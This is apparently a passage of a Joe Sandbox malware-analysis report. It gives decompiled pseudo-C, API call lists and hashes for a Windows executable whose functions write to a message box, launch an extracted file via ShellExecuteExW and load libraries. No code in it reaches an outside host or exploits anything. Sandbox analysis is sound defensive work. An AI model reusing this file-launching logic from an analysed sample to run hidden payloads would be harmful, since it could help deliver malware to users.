                0x003dde2e
                0x003dde30
                0x003dde33
                0x003dde36
                0x003dde38
                0x003dde55
                0x003dde58
                0x003dde5b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003dde61
                0x003dde61
                0x003dde61
                0x003dde64
                0x003dde67
                0x003dde6b
                0x00000000
                0x00000000
                0x003dde6d
                0x003dde6d
                0x003dde71
                0x003dde78
                0x003dde7b
                0x003dde80
                0x003dde81
                0x003dde84
                0x003dde87
                0x003dde8a
                0x003ddeab
                0x003ddead
                0x003ddec5
                0x003ddecd
                0x003dded0
                0x003dded3
                0x003dded6
                0x003ddefc
                0x003ddeff
                0x003ddf04
                0x003ddf06
                0x003ddf06
                0x003ddf1c
                0x003ddf21
                0x003dded8
                0x003ddee4
                0x003ddef0
                0x003ddef4
                0x003ddef4
                0x003dde4d
                0x003dde4d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003dde8c
                0x003dde8c
                0x003dde8c
                0x003dde8f
                0x00000000
                0x00000000
                0x003dde91
                0x003dde94
                0x003dde97
                0x003dde9f
                0x003ddea2
                0x003ddea3
                0x003ddea6
                0x00000000
                0x00000000
                0x00000000
                0x003ddea6
                0x003ddea8
                0x00000000
                0x003ddea8
                0x003dde73
                0x003dde73
                0x003dde61
                0x003dde61
                0x003dde64
                0x003dde67
                0x003dde6b
                0x00000000
                0x00000000
                0x00000000
                0x003dde6b
                0x003dde61
                0x003dde48
                0x00000000
                0x003dde48
                0x003ddda4
                0x003ddda8
                0x00000000
                0x00000000
                0x00000000
                0x003de150
                0x003de150
                0x003de150
                0x003de159
                0x00000000
                0x003ddd4a
                0x003ddd4b
                0x00000000
                0x003ddd50
                0x003ddd48
                0x003ddcd3
                0x003ddcd5
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ddb17
                0x003ddb1a
                0x003ddb23
                0x003ddb28
                0x003ddb29
                0x003ddb2f
                0x00000000
                0x003ddb31
                0x003ddb31
                0x00000000
                0x003ddb31
                0x003ddb2f

                APIs
                • __EH_prolog.LIBCMT ref: 003DDA70
                • _wcschr.LIBVCRUNTIME ref: 003DDA91
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 003DDAAC
                  • Part of subcall function 003DC29A: _wcslen.LIBCMT ref: 003DC2A2
                  • Part of subcall function 003E05DA: _wcslen.LIBCMT ref: 003E05E0
                  • Part of subcall function 003E1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,003DBAE9,00000000,?,?,?,000303F2), ref: 003E1BA0
                • _wcslen.LIBCMT ref: 003DDDE9
                • __fprintf_l.LIBCMT ref: 003DDF1C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9@
                • API String ID: 557298264-3393531270
                • Opcode ID: 324286c69d8c6b4d10f6457fd898983ae0fc0d2c52c98324c8c469048a3e6123
                • Instruction ID: 33ffcf95f1d848aec6278d1b2ce88d88f360692ab20d511fc5d0d67f7421b1ab
                • Opcode Fuzzy Hash: 324286c69d8c6b4d10f6457fd898983ae0fc0d2c52c98324c8c469048a3e6123
                • Instruction Fuzzy Hash: ED32D173A00218ABCF26EF64E841BEA7BA9FF14700F41456BF9059B391E7B19985CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 100%
                			E003ED4D4() {
                				intOrPtr _t41;
                				intOrPtr _t44;
                				struct HWND__* _t46;
                				void* _t48;
                				char _t49;
                
                				E003EB568(); // executed
                				_t46 = GetDlgItem( *0x418458, 0x68);
                				_t49 =  *0x418463; // 0x1
                				if(_t49 == 0) {
                					_t44 =  *0x418440; // 0x0
                					E003E9285(_t44);
                					ShowWindow(_t46, 5); // executed
                					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
                					SendMessageW(_t46, 0xc2, 0, 0x4035f4);
                					 *0x418463 = 1;
                				}
                				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
                				 *(_t48 + 0x10) = 0x5c;
                				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
                				 *((char*)(_t48 + 0x29)) = 0;
                				_t41 =  *((intOrPtr*)(_t48 + 0x70));
                				 *((intOrPtr*)(_t48 + 0x14)) = 1;
                				if(_t41 != 0) {
                					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
                					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
                					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
                				}
                				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
                				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
                				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
                				if(_t41 != 0) {
                					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
                					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
                				}
                				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
                			}









                APIs
                  • Part of subcall function 003EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003EB579
                  • Part of subcall function 003EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003EB58A
                  • Part of subcall function 003EB568: IsDialogMessageW.USER32(000303F2,?), ref: 003EB59E
                  • Part of subcall function 003EB568: TranslateMessage.USER32(?), ref: 003EB5AC
                  • Part of subcall function 003EB568: DispatchMessageW.USER32(?), ref: 003EB5B6
                • GetDlgItem.USER32(00000068,0042FCB8), ref: 003ED4E8
                • ShowWindow.USER32(00000000,00000005,?,?,?,003EAF07,00000001,?,?,003EB7B9,0040506C,0042FCB8,0042FCB8,00001000,00000000,00000000), ref: 003ED510
                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 003ED51B
                • SendMessageW.USER32(00000000,000000C2,00000000,004035F4), ref: 003ED529
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 003ED53F
                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 003ED559
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 003ED59D
                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 003ED5AB
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 003ED5BA
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 003ED5E1
                • SendMessageW.USER32(00000000,000000C2,00000000,004043F4), ref: 003ED5F0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                • String ID: \
                • API String ID: 3569833718-2967466578
                • Opcode ID: e7859d428c4ccb5ccbf33a1a26c6d43f123547b3a50316709262cdeba1b7f060
                • Instruction ID: acb6c7cb21e72a0059bf1925633ee1cee3ba5990e47b5fa026c6d19bf901bd22
                • Opcode Fuzzy Hash: e7859d428c4ccb5ccbf33a1a26c6d43f123547b3a50316709262cdeba1b7f060
                • Instruction Fuzzy Hash: 2231C471145342BFE301DF20DC4AFAB7FACEB86705F004529F651961D0EB759A048B7A
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 812 3ed78f-3ed7a7 call 3eec50 815 3ed7ad-3ed7b9 call 3f3e13 812->815 816 3ed9e8-3ed9f0 812->816 815->816 819 3ed7bf-3ed7e7 call 3efff0 815->819 822 3ed7e9 819->822 823 3ed7f1-3ed7ff 819->823 822->823 824 3ed812-3ed818 823->824 825 3ed801-3ed804 823->825 827 3ed85b-3ed85e 824->827 826 3ed808-3ed80e 825->826 829 3ed837-3ed844 826->829 830 3ed810 826->830 827->826 828 3ed860-3ed866 827->828 833 3ed86d-3ed86f 828->833 834 3ed868-3ed86b 828->834 831 3ed84a-3ed84e 829->831 832 3ed9c0-3ed9c2 829->832 835 3ed822-3ed82c 830->835 838 3ed9c6 831->838 839 3ed854-3ed859 831->839 832->838 840 3ed882-3ed898 call 3db92d 833->840 841 3ed871-3ed878 833->841 834->833 834->840 836 3ed82e 835->836 837 3ed81a-3ed820 835->837 836->829 837->835 844 3ed830-3ed833 837->844 845 3ed9cf 838->845 839->827 848 3ed89a-3ed8a7 call 3e1fbb 840->848 849 3ed8b1-3ed8bc call 3da231 840->849 841->840 842 3ed87a 841->842 842->840 844->829 847 3ed9d6-3ed9d8 845->847 851 3ed9da-3ed9dc 847->851 852 3ed9e7 847->852 848->849 857 3ed8a9 848->857 858 3ed8be-3ed8d5 call 3db6c4 849->858 859 3ed8d9-3ed8e6 ShellExecuteExW 849->859 851->852 856 3ed9de-3ed9e1 ShowWindow 851->856 852->816 856->852 857->849 858->859 859->852 861 3ed8ec-3ed8f9 859->861 863 3ed90c-3ed90e 861->863 864 3ed8fb-3ed902 861->864 866 3ed925-3ed944 call 3edc3b 863->866 867 3ed910-3ed919 863->867 864->863 865 3ed904-3ed90a 864->865 865->863 868 3ed97b-3ed987 CloseHandle 865->868 866->868 881 3ed946-3ed94e 866->881 867->866 874 3ed91b-3ed923 ShowWindow 867->874 870 3ed998-3ed9a6 868->870 871 3ed989-3ed996 call 3e1fbb 868->871 870->847 873 3ed9a8-3ed9aa 870->873 871->845 871->870 873->847 877 3ed9ac-3ed9b2 873->877 874->866 877->847 880 3ed9b4-3ed9be 877->880 880->847 881->868 882 3ed950-3ed961 GetExitCodeProcess 881->882 882->868 883 3ed963-3ed96d 882->883 884 3ed96f 883->884 885 3ed974 883->885 884->885 885->868
                C-Code - Quality: 81%
                			E003ED78F(void* __ebp, struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, intOrPtr _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, void* _a4164, signed short* _a4168, intOrPtr _a4172, intOrPtr _a4176) {
                				long _v12;
                				void* __edi;
                				int _t47;
                				signed int _t50;
                				void* _t51;
                				signed short* _t53;
                				long _t64;
                				signed int _t71;
                				void* _t72;
                				signed short _t73;
                				int _t74;
                				void* _t76;
                				signed int _t77;
                				intOrPtr _t78;
                				long _t80;
                				signed int _t81;
                				void* _t82;
                				void* _t84;
                				signed int _t86;
                				signed short* _t87;
                				struct HWND__* _t88;
                				void* _t89;
                				void* _t92;
                
                				_t89 = __ebp;
                				_t47 = E003EEC50(0x1040);
                				_t87 = _a4168;
                				_t74 = 0;
                				if( *_t87 == 0) {
                					L54:
                					return _t47;
                				}
                				_t47 = E003F3E13(_t87);
                				if(_t47 >= 0x7f6) {
                					goto L54;
                				} else {
                					_t80 = 0x3c;
                					E003EFFF0(_t80,  &_a4, 0, _t80);
                					_t78 = _a4176;
                					_t92 = _t92 + 0xc;
                					_a4.cbSize = _t80;
                					_a8 = 0x1c0;
                					if(_t78 != 0) {
                						_a8 = 0x5c0;
                					}
                					_t50 =  *_t87 & 0x0000ffff;
                					_push(_t89);
                					_t76 = 0x22;
                					_t81 = _t50;
                					_t77 = _t74;
                					if(_t50 != _t76) {
                						_t90 = _t87;
                						_a20 = _t87;
                						goto L16;
                					} else {
                						_t90 =  &(_t87[1]);
                						_a20 =  &(_t87[1]);
                						L6:
                						_t51 = 0x22;
                						if(_t81 != _t51) {
                							L13:
                							_t82 = 0x20;
                							_t53 =  &(( &(_t87[1]))[_t77]);
                							if(_t87[_t77] == _t82) {
                								_t87[_t77] = 0;
                								L48:
                								_a24 = _t53;
                								L18:
                								if(_t53 == 0 ||  *_t53 == _t74) {
                									if(_t78 == 0 &&  *0x41b472 != _t74) {
                										_a24 = 0x41b472;
                									}
                								}
                								_a32 = _a4172;
                								_t84 = E003DB92D(_t90);
                								if(_t84 != 0 && E003E1FBB(_t84, L".inf") == 0) {
                									_a16 = L"Install";
                								}
                								if(E003DA231(_a20) != 0) {
                									E003DB6C4(_a20,  &_a64, 0x800);
                									_a8 =  &_a52;
                								}
                								_t47 = ShellExecuteExW( &_a4); // executed
                								if(_t47 != 0) {
                									_t88 = _a4160;
                									if( *0x419468 != _t74 || _a4172 != _t74 ||  *0x427b7a != _t74) {
                										if(_t88 != 0) {
                											_push(_t88);
                											if( *0x4330a8() != 0) {
                												ShowWindow(_t88, _t74);
                												_t74 = 1;
                											}
                										}
                										 *0x4330a4(_a56, 0x7d0);
                										E003EDC3B(_a48);
                										if( *0x427b7a != 0 && _a4164 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
                											_t64 = _v12;
                											if(_t64 >  *0x42fca4) {
                												 *0x42fca4 = _t64;
                											}
                											 *0x427b7b = 1;
                										}
                									}
                									CloseHandle(_a48);
                									if(_t84 == 0 || E003E1FBB(_t84, L".exe") != 0) {
                										_t47 = _a4164;
                										if( *0x419468 != 0 && _t47 == 0 &&  *0x427b7a == _t47) {
                											 *0x42fca8 = 0x1b58;
                										}
                									} else {
                										_t47 = _a4164;
                									}
                									if(_t74 != 0 && _t47 != 0) {
                										_t47 = ShowWindow(_t88, 1);
                									}
                								}
                								goto L54;
                							}
                							if( *_t53 == 0x2f) {
                								goto L48;
                							}
                							_t77 = _t77 + 1;
                							_t50 = _t87[_t77] & 0x0000ffff;
                							_t81 = _t50;
                							L16:
                							if(_t50 != 0) {
                								goto L6;
                							}
                							_t53 = _a24;
                							goto L18;
                						} else {
                							while(1) {
                								_t77 = _t77 + 1;
                								_t71 = _t87[_t77] & 0x0000ffff;
                								_t86 = _t71;
                								if(_t71 == 0) {
                									break;
                								}
                								_t72 = 0x22;
                								if(_t86 == _t72) {
                									_t73 = 0x20;
                									_t87[_t77] = _t73;
                									goto L13;
                								}
                							}
                							goto L13;
                						}
                					}
                				}
                			}



























                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                • String ID: .exe$.inf$h>$r>
                • API String ID: 36480843-509201921
                • Opcode ID: 6b528898715e24b67e41555761385cc469d5dbedd45e56dacaef9ce6e10323a8
                • Instruction ID: eae795e4e27def680709a7ae4a749ce5e8348a2c52277c5e475e215d01648e8a
                • Opcode Fuzzy Hash: 6b528898715e24b67e41555761385cc469d5dbedd45e56dacaef9ce6e10323a8
                • Instruction Fuzzy Hash: 1E51F4711043D09AEB329F26DC40BABBBE4AF41744F05062EF9C49B1D2D7709D85CB56
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 911 3f3b72-3f3b7c 912 3f3bee-3f3bf1 911->912 913 3f3b7e-3f3b8c 912->913 914 3f3bf3 912->914 915 3f3b8e-3f3b91 913->915 916 3f3b95-3f3bb1 LoadLibraryExW 913->916 917 3f3bf5-3f3bf9 914->917 918 3f3c09-3f3c0b 915->918 919 3f3b93 915->919 920 3f3bfa-3f3c00 916->920 921 3f3bb3-3f3bbc GetLastError 916->921 918->917 922 3f3beb 919->922 920->918 925 3f3c02-3f3c03 FreeLibrary 920->925 923 3f3bbe-3f3bd3 call 3f6088 921->923 924 3f3be6-3f3be9 921->924 922->912 923->924 928 3f3bd5-3f3be4 LoadLibraryExW 923->928 924->922 925->918 928->920 928->924
                C-Code - Quality: 100%
                			E003F3B72(void* __ecx, signed int* _a4, intOrPtr _a8) {
                				WCHAR* _v8;
                				signed int _t11;
                				WCHAR* _t12;
                				struct HINSTANCE__* _t13;
                				struct HINSTANCE__* _t16;
                				struct HINSTANCE__* _t18;
                				signed int* _t22;
                				signed int* _t26;
                				struct HINSTANCE__* _t29;
                				WCHAR* _t31;
                				void* _t32;
                
                				_t26 = _a4;
                				while(_t26 != _a8) {
                					_t11 =  *_t26;
                					_t22 = 0x4320e0 + _t11 * 4;
                					_t29 =  *_t22;
                					if(_t29 == 0) {
                						_t12 =  *(0x4062b4 + _t11 * 4);
                						_v8 = _t12;
                						_t13 = LoadLibraryExW(_t12, 0, 0x800); // executed
                						_t29 = _t13;
                						if(_t29 != 0) {
                							L13:
                							 *_t22 = _t29;
                							if( *_t22 != 0) {
                								FreeLibrary(_t29);
                							}
                							L15:
                							_t16 = _t29;
                							L12:
                							return _t16;
                						}
                						_t18 = GetLastError();
                						if(_t18 != 0x57) {
                							L8:
                							 *_t22 = _t18 | 0xffffffff;
                							L9:
                							_t26 =  &(_t26[1]);
                							continue;
                						}
                						_t7 =  &_v8; // 0x3f2a63
                						_t31 =  *_t7;
                						_t18 = E003F6088(_t31, L"api-ms-", 7);
                						_t32 = _t32 + 0xc;
                						if(_t18 == 0) {
                							goto L8;
                						}
                						_t18 = LoadLibraryExW(_t31, 0, 0);
                						_t29 = _t18;
                						if(_t29 != 0) {
                							goto L13;
                						}
                						goto L8;
                					}
                					if(_t29 != 0xffffffff) {
                						goto L15;
                					}
                					goto L9;
                				}
                				_t16 = 0;
                				goto L12;
                			}














                APIs
                • FreeLibrary.KERNEL32(00000000,?,?,003F3C35,00000000,00000FA0,00432088,00000000,?,003F3D60,00000004,InitializeCriticalSectionEx,00406394,InitializeCriticalSectionEx,00000000), ref: 003F3C03
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FreeLibrary
                • String ID: api-ms-$c*?
                • API String ID: 3664257935-2087528462
                • Opcode ID: 85ac54919f156d7f86bcc59b7cf48e5e399f2a2c8ab7fec172749823fa3a8fac
                • Instruction ID: d0b843ed08efa052784077c029c51a39bd9b36ee03a61d0d478b944c5e125241
                • Opcode Fuzzy Hash: 85ac54919f156d7f86bcc59b7cf48e5e399f2a2c8ab7fec172749823fa3a8fac
                • Instruction Fuzzy Hash: 18112C31A05229ABCB238BA89C51B6D3B689F01770F220160FE11FB2D0D774EF0086D4
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 929 3fa95b-3fa974 930 3fa98a-3fa98f 929->930 931 3fa976-3fa986 call 3fef4c 929->931 933 3fa99c-3fa9c0 MultiByteToWideChar 930->933 934 3fa991-3fa999 930->934 931->930 938 3fa988 931->938 936 3fa9c6-3fa9d2 933->936 937 3fab53-3fab66 call 3efbbc 933->937 934->933 939 3faa26 936->939 940 3fa9d4-3fa9e5 936->940 938->930 943 3faa28-3faa2a 939->943 944 3fa9e7-3fa9f6 call 402010 940->944 945 3faa04-3faa15 call 3f8e06 940->945 947 3fab48 943->947 948 3faa30-3faa43 MultiByteToWideChar 943->948 944->947 954 3fa9fc-3faa02 944->954 945->947 955 3faa1b 945->955 953 3fab4a-3fab51 call 3fabc3 947->953 948->947 952 3faa49-3faa5b call 3faf6c 948->952 959 3faa60-3faa64 952->959 953->937 958 3faa21-3faa24 954->958 955->958 958->943 959->947 961 3faa6a-3faa71 959->961 962 3faaab-3faab7 961->962 963 3faa73-3faa78 961->963 964 3faab9-3faaca 962->964 965 3fab03 962->965 963->953 966 3faa7e-3faa80 963->966 969 3faacc-3faadb call 402010 964->969 970 3faae5-3faaf6 call 3f8e06 964->970 967 3fab05-3fab07 965->967 966->947 968 3faa86-3faaa0 call 3faf6c 966->968 971 3fab09-3fab22 call 3faf6c 967->971 972 3fab41-3fab47 call 3fabc3 967->972 968->953 982 3faaa6 968->982 969->972 984 3faadd-3faae3 969->984 970->972 985 3faaf8 970->985 971->972 986 3fab24-3fab2b 971->986 972->947 982->947 987 3faafe-3fab01 984->987 985->987 988 3fab2d-3fab2e 986->988 989 3fab67-3fab6d 986->989 987->967 990 3fab2f-3fab3f WideCharToMultiByte 988->990 989->990 990->972 991 3fab6f-3fab76 call 3fabc3 990->991 991->953
                C-Code - Quality: 70%
                			E003FA95B(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                				signed int _v8;
                				int _v12;
                				void* _v24;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				signed int _t49;
                				signed int _t54;
                				int _t57;
                				signed int _t59;
                				short* _t61;
                				signed int _t65;
                				short* _t70;
                				int _t79;
                				void* _t81;
                				short* _t82;
                				signed int _t88;
                				signed int _t91;
                				void* _t96;
                				int _t98;
                				void* _t99;
                				short* _t101;
                				int _t103;
                				void* _t104;
                				int _t105;
                				signed int _t106;
                				short* _t107;
                				void* _t110;
                
                				_push(__ecx);
                				_push(__ecx);
                				_t49 =  *0x40e7ac; // 0xc24f6281
                				_v8 = _t49 ^ _t106;
                				_t103 = _a20;
                				if(_t103 > 0) {
                					_t79 = E003FEF4C(_a16, _t103);
                					_t110 = _t79 - _t103;
                					_t4 = _t79 + 1; // 0x1
                					_t103 = _t4;
                					if(_t110 >= 0) {
                						_t103 = _t79;
                					}
                				}
                				_t98 = _a32;
                				if(_t98 == 0) {
                					_t98 =  *( *_a4 + 8);
                					_a32 = _t98;
                				}
                				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                				_v12 = _t54;
                				if(_t54 == 0) {
                					L38:
                					_pop(_t99);
                					_pop(_t104);
                					_pop(_t81);
                					return E003EFBBC(_t54, _t81, _v8 ^ _t106, _t96, _t99, _t104);
                				} else {
                					_t96 = _t54 + _t54;
                					_t86 = _t96 + 8;
                					asm("sbb eax, eax");
                					if((_t96 + 0x00000008 & _t54) == 0) {
                						_t82 = 0;
                						__eflags = 0;
                						L14:
                						if(_t82 == 0) {
                							L36:
                							_t105 = 0;
                							L37:
                							E003FABC3(_t82);
                							_t54 = _t105;
                							goto L38;
                						}
                						_t57 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t82, _v12);
                						_t121 = _t57;
                						if(_t57 == 0) {
                							goto L36;
                						}
                						_t100 = _v12;
                						_t59 = E003FAF6C(_t82, _t86, _v12, _t121, _a8, _a12, _t82, _v12, 0, 0, 0, 0, 0); // executed
                						_t105 = _t59;
                						if(_t105 == 0) {
                							goto L36;
                						}
                						if((_a12 & 0x00000400) == 0) {
                							_t96 = _t105 + _t105;
                							_t88 = _t96 + 8;
                							__eflags = _t96 - _t88;
                							asm("sbb eax, eax");
                							__eflags = _t88 & _t59;
                							if((_t88 & _t59) == 0) {
                								_t101 = 0;
                								__eflags = 0;
                								L30:
                								__eflags = _t101;
                								if(__eflags == 0) {
                									L35:
                									E003FABC3(_t101);
                									goto L36;
                								}
                								_t61 = E003FAF6C(_t82, _t88, _t101, __eflags, _a8, _a12, _t82, _v12, _t101, _t105, 0, 0, 0);
                								__eflags = _t61;
                								if(_t61 == 0) {
                									goto L35;
                								}
                								_push(0);
                								_push(0);
                								__eflags = _a28;
                								if(_a28 != 0) {
                									_push(_a28);
                									_push(_a24);
                								} else {
                									_push(0);
                									_push(0);
                								}
                								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                								__eflags = _t105;
                								if(_t105 != 0) {
                									E003FABC3(_t101);
                									goto L37;
                								} else {
                									goto L35;
                								}
                							}
                							_t91 = _t96 + 8;
                							__eflags = _t96 - _t91;
                							asm("sbb eax, eax");
                							_t65 = _t59 & _t91;
                							_t88 = _t96 + 8;
                							__eflags = _t65 - 0x400;
                							if(_t65 > 0x400) {
                								__eflags = _t96 - _t88;
                								asm("sbb eax, eax");
                								_t101 = E003F8E06(_t88, _t65 & _t88);
                								_pop(_t88);
                								__eflags = _t101;
                								if(_t101 == 0) {
                									goto L35;
                								}
                								 *_t101 = 0xdddd;
                								L28:
                								_t101 =  &(_t101[4]);
                								goto L30;
                							}
                							__eflags = _t96 - _t88;
                							asm("sbb eax, eax");
                							E00402010(_t65 & _t88);
                							_t101 = _t107;
                							__eflags = _t101;
                							if(_t101 == 0) {
                								goto L35;
                							}
                							 *_t101 = 0xcccc;
                							goto L28;
                						}
                						_t70 = _a28;
                						if(_t70 == 0) {
                							goto L37;
                						}
                						_t125 = _t105 - _t70;
                						if(_t105 > _t70) {
                							goto L36;
                						}
                						_t105 = E003FAF6C(_t82, 0, _t100, _t125, _a8, _a12, _t82, _t100, _a24, _t70, 0, 0, 0);
                						if(_t105 != 0) {
                							goto L37;
                						}
                						goto L36;
                					}
                					asm("sbb eax, eax");
                					_t72 = _t54 & _t96 + 0x00000008;
                					_t86 = _t96 + 8;
                					if((_t54 & _t96 + 0x00000008) > 0x400) {
                						__eflags = _t96 - _t86;
                						asm("sbb eax, eax");
                						_t82 = E003F8E06(_t86, _t72 & _t86);
                						_pop(_t86);
                						__eflags = _t82;
                						if(__eflags == 0) {
                							goto L36;
                						}
                						 *_t82 = 0xdddd;
                						L12:
                						_t82 =  &(_t82[4]);
                						goto L14;
                					}
                					asm("sbb eax, eax");
                					E00402010(_t72 & _t86);
                					_t82 = _t107;
                					if(_t82 == 0) {
                						goto L36;
                					}
                					 *_t82 = 0xcccc;
                					goto L12;
                				}
                			}































                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003F57FB,003F57FB,?,?,?,003FABAC,00000001,00000001,2DE85006), ref: 003FA9B5
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003FABAC,00000001,00000001,2DE85006,?,?,?), ref: 003FAA3B
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003FAB35
                • __freea.LIBCMT ref: 003FAB42
                  • Part of subcall function 003F8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,003F4286,?,0000015D,?,?,?,?,003F5762,000000FF,00000000,?,?), ref: 003F8E38
                • __freea.LIBCMT ref: 003FAB4B
                • __freea.LIBCMT ref: 003FAB70
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocateHeap
                • String ID:
                • API String ID: 1414292761-0
                • Opcode ID: 9fc26ebea9741085bd4b30af44f0aede9f44a8efa66ff4810f89bfa97ae5cb06
